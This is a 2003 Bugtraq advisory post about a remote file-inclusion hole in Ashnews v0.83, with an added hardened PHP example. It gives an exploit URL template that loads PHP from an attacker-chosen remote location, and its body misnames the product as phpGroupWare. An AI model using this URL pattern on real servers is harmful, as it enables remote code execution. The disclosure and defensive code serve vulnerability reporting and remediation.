[30838] in bugtraq
sorry, wrong file
daemon@ATHENA.MIT.EDU (phil dunn)
Tue Jul 22 12:59:54 2003
Date: 22 Jul 2003 15:05:29 -0000
Message-ID: <20030722150529.6557.qmail@www.securityfocus.com>
From: phil dunn <z3hp@yahoo.com>
To: bugtraq@securityfocus.com
######################################################
## Name: Phil Dunn ##
## Email: z3hp@yahoo.com ##
## Date: July - 20 - 2003 ##
## Program: Ashnews v0.83 ##
## Version: v0.83 ##
##Vendor Name: AshWebStudio ##
## Vendor URL: http://projects.ashwebstudio.com/ ##
######################################################
An include file vulnerability was found in phpGroupWare. This exploit works
for all branches. A remote user can create arbitrary PHP code and place it
on a remote server. Then, the remote user can issue a specially crafted URL
to the target server that specifies the remote PHP code for inclusion.
ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------
Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
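
A hardened form of the include at line 14, as an added example that is not part of the original post and is not AshNews code. `safe_config_path()` and `$appRoot` are hypothetical names, and the demo directory and candidate values are constructed.

```php
<?php
// Added example; not AshNews code. safe_config_path() and $appRoot are hypothetical.
// Assumption: the request value reaches $pathtoashnews only because the script
// never assigns it itself (e.g. register_globals). The fix is to set the base
// path server-side and to validate it before include.

/**
 * Return the absolute path of ashprojects/newsconfig.php under $appRoot,
 * or throw if $base would take the include outside the application root.
 */
function safe_config_path(string $appRoot, string $base): string
{
    // Refuse stream wrappers (http://, ftp://, php://, data: ...). Two or more
    // scheme characters are required so a Windows drive letter is not rejected.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $base)) {
        throw new InvalidArgumentException("stream wrapper refused: $base");
    }
    $root = realpath($appRoot);
    $path = realpath($base . 'ashprojects/newsconfig.php');
    // realpath() resolves ../ and symlinks and returns false for missing files.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("include outside application root: $base");
    }
    return $path;
}

// Constructed demo tree standing in for an install directory.
$appRoot = sys_get_temp_dir() . '/ashnews_demo_' . getmypid();
mkdir($appRoot . '/ashprojects', 0700, true);
file_put_contents($appRoot . '/ashprojects/newsconfig.php', "<?php \$newsconfig_loaded = true;\n");

// Constructed inputs: the server-side default, then values a request could supply.
$candidates = [
    $appRoot . '/',                     // set by the application itself
    'http://remote.example/',           // remote location, as in the advisory URL
    $appRoot . '/ashprojects/../../',   // traversal out of the root
];
foreach ($candidates as $base) {
    try {
        include safe_config_path($appRoot, $base);
        echo "included: $base\n";
    } catch (Exception $e) {
        echo 'blocked:  ' . $e->getMessage() . "\n";
    }
}
```

Only the first candidate is included; the remote URL and the traversal path are rejected before `include` is reached.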